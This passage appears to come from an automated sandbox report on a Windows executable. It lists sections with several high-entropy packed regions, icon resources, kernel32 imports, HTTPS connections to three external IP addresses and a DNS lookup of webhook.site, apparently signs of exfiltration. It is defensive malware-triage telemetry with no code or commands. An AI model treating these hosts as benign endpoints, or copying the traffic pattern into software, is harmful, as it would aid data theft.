            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x43f9c70x43fa0093ab02644e5bc6be32bdc44148f6241cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x4410000x7d3ec80x7d40001031f973465d9807e488c2776d4018b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xc150000x9052c0x40200b8b6d170ac2d6555ccdc0d422b350a33False0.4249474597953216data5.397190463150314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            /40xca60000x1290x20017f62672c8506464ae13eccc2eb6cb94False0.623046875data5.081946473254993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /190xca70000x93a4d0x93c007432fbecb3846a2bfdcd97e60f4bb176False0.9994580160744501data7.99709352118608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /320xd3b0000x1aa7e0x1ac006107bd18e7d1a75b4dbfc05519aeb376False0.9970611857476636data7.980495350057696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /460xd560000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /650xd570000x1188db0x118a004103f5855174557c357c3f76ba497c84False0.9992726893095768data7.998119202815533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /780xe700000xbe9a70xbea006ed6d3604e02eb1f700bbdea295f3b78False0.9707018442622951data7.995412390964892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            /900xf2f0000x35a120x35c00a1e755b189b82d186b0b817718348054False0.9919240552325581data7.93877226373691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            .idata0xf650000x45e0x600c335fa8c898d86124603236f3cd43213False0.3600260416666667data3.8665733999137393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .reloc0xf660000x379860x37a00aadade653e74874093ba9275807f34aaFalse0.6049025632022472data6.714690439162056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            .symtab0xf9e0000x8d0ac0x8d2002e348d29d1f15e92afa2eae9ad351dedFalse0.20255411315323296data5.379502460284081IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            .rsrc0x102c0000x328100x32a00bfe0e65b553a38c1f842dfb6096f9661False0.5041136188271605data6.521872407894044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x102c2500x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7987588652482269
            RT_ICON0x102c6b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.6221311475409836
            RT_ICON0x102d0400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.21931407942238268
            RT_ICON0x102d8e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4059128630705394
            RT_ICON0x102fe900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3863367973547473
            RT_ICON0x10340b80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 207360.41367837338262475
            RT_ICON0x10395400x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 368640.3618614673113307
            RT_ICON0x10429e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.33448184076659176
            RT_ICON0x10532100xb57bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9970726877461848
            RT_GROUP_ICON0x105e78c0x84data0.75

            Imports

            DLLImport
            kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 22, 2024 15:39:32.955832958 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:32.955857038 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:32.956032038 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:32.956892014 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:32.956902981 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.652070045 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.683671951 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:33.683693886 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.699095011 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:33.699100971 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.700522900 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.700613022 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:33.825396061 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:33.825515032 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.825680017 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:33.825696945 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:33.873900890 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:34.674674988 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:34.674757957 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:34.674822092 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:34.675071955 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:34.675088882 CEST4434970246.4.105.116192.168.2.7
            Aug 22, 2024 15:39:34.675111055 CEST49702443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:35.469311953 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:35.469345093 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:35.469423056 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:35.470232010 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:35.470242977 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.144103050 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.144618988 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.144640923 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.145055056 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.145060062 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.146104097 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.146224976 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.156563044 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.156625032 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.157538891 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.157553911 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.205636978 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.559938908 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.560000896 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.560098886 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.560301065 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.560301065 CEST49705443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.560317039 CEST4434970546.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.768558979 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.768590927 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:36.774856091 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.777322054 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:36.777333021 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.563760042 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.563997030 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:37.564009905 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.564443111 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:37.564446926 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.565443039 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.565502882 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:37.568322897 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:37.568377972 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.568438053 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:37.568444014 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:37.615523100 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:38.032918930 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:38.033003092 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:38.033178091 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:38.033236027 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:38.033255100 CEST4434970846.4.105.116192.168.2.7
            Aug 22, 2024 15:39:38.033288002 CEST49708443192.168.2.746.4.105.116
            Aug 22, 2024 15:39:38.051882029 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:38.051918030 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:38.051995039 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:38.052751064 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:38.052763939 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.351569891 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.353688955 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.353708982 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.354167938 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.354172945 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.355041981 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.355114937 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.357594013 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.357645988 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.357714891 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.357719898 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.404723883 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.922200918 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.922246933 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.922302008 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.922571898 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.922583103 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.922611952 CEST49709443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.922616959 CEST44349709154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.928915024 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.928944111 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:39.929020882 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.929693937 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:39.929706097 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.081553936 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.081799984 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.081819057 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.082354069 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.082357883 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.085891008 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.085999966 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088541985 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088614941 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.088692904 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088699102 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.088788033 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088809967 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.088836908 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088851929 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.088907957 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.088928938 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.089023113 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.089046001 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.089495897 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.089504957 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.089730978 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.089754105 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.089761972 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.089941978 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.089970112 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.090213060 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.090246916 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.090395927 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.090401888 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.090791941 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.090802908 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.090955019 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.090970993 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.090986967 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.090992928 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.091219902 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.091232061 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.091408968 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.091420889 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.091586113 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.091598034 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.091792107 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.091804981 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.091988087 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092000008 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.092222929 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092236042 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.092408895 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092421055 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.092600107 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092611074 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.092776060 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092793941 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.092956066 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.092968941 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.093162060 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.093173981 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.093375921 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.093386889 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.093580961 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.093592882 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.093751907 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.093764067 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.093939066 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.093950033 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.094130039 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.094142914 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.094317913 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.094329119 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.094511032 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.094522953 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:41.094687939 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:41.094698906 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:42.593209982 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:42.593277931 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:42.593374014 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.593633890 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.593645096 CEST44349711154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:42.593673944 CEST49711443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.596679926 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.596713066 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:42.596791983 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.597528934 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:42.597542048 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.767729998 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.768136024 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.768162966 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.768641949 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.768646002 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.772205114 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.772299051 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.774970055 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.775140047 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.775144100 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.775224924 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:43.775239944 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:43.822767973 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:44.358025074 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:44.358189106 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:44.358257055 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:44.358500004 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:44.358515978 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:44.358532906 CEST49715443192.168.2.7154.18.200.102
            Aug 22, 2024 15:39:44.358537912 CEST44349715154.18.200.102192.168.2.7
            Aug 22, 2024 15:39:44.371908903 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:44.371958971 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:44.372028112 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:44.372710943 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:44.372725964 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.232728958 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.232906103 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.232927084 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.233366013 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.233371019 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.234811068 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.234865904 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.242723942 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.242808104 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.242914915 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.242923021 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.290451050 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.646162987 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.646250963 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.646370888 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.646632910 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:45.646661997 CEST44349718178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:45.646675110 CEST49718443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:46.689954996 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:46.690011024 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:46.690078974 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:46.690872908 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:46.690891027 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.368649960 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.369266987 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.369266987 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.369292021 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.369307995 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.370826960 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.371085882 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.373547077 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.373547077 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.373558998 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.373641968 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.426525116 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.426548004 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.479907036 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.909434080 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.909549952 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.909615040 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.909765959 CEST54497443192.168.2.7178.63.67.153
            Aug 22, 2024 15:39:47.909784079 CEST44354497178.63.67.153192.168.2.7
            Aug 22, 2024 15:39:47.909801006 CEST54497443192.168.2.7178.63.67.153

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 22, 2024 15:39:32.923933029 CEST5978653192.168.2.71.1.1.1
            Aug 22, 2024 15:39:32.934443951 CEST53597861.1.1.1192.168.2.7
            Aug 22, 2024 15:39:38.037616014 CEST5368153192.168.2.71.1.1.1
            Aug 22, 2024 15:39:38.051115036 CEST53536811.1.1.1192.168.2.7
            Aug 22, 2024 15:39:44.361763954 CEST6073153192.168.2.71.1.1.1
            Aug 22, 2024 15:39:44.371025085 CEST53607311.1.1.1192.168.2.7
            Aug 22, 2024 15:39:46.129899025 CEST53569121.1.1.1192.168.2.7

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 22, 2024 15:39:32.923933029 CEST192.168.2.71.1.1.10x79d4Standard query (0)webhook.siteA (IP address)IN (0x0001)false
